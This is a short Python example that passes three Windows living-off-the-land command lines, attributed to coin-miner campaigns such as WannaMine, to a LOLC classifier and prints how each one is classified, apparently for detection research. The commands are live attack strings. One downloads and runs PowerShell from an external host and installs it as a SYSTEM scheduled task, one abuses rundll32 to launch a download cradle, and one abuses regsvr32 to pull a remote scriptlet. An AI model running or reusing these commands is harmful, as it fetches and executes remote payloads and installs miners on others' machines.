LOLBINS coin miner commands from https://lolbas-project.github.io/

LOLC_CoinMiners.py

# LOLBINS coin miner commands from https://lolbas-project.github.io/ 
# LOLBINS rundll32 execution: https://lolbas-project.github.io/lolbas/Binaries/Rundll32/#execute
# LOLBINS regsvr32 execution: https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/#execute
# References: 
# WannaMine: https://www.accenture.com/_acnmedia/pdf-46/accenture-threat-analysis-monero-wannamine.pdf
# https://logrhythm.com/blog/how-to-enable-process-creation-events-to-track-malware-and-threat-actor-activity/

from lol.api import LOLC, PlatformType
lolc=LOLC(PlatformType.WINDOWS) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands=['cmd /c echo powershell -nop $a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains(SCM Event Filter)))) {IEX(New-Object Net.WebClient).DownloadString(http://stafftest.spdns.eu:8000/mate6.ps1)} >%temp%\y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR %temp%\y1.bat &&SCHTASKS /run /TN yastcat',
          'rundll32.exe javascript:\..\mshtml,RunHTMLApplication;document.write();new%20ActiveXObject(WScript.Shell).Run(powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(http://ip:port/);',
          'regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll']
classification, tags = lolc(commands)
for command, status, tag in zip (commands, classification, tags):
    print(command)
    print(status)
    print(tag)
    print("")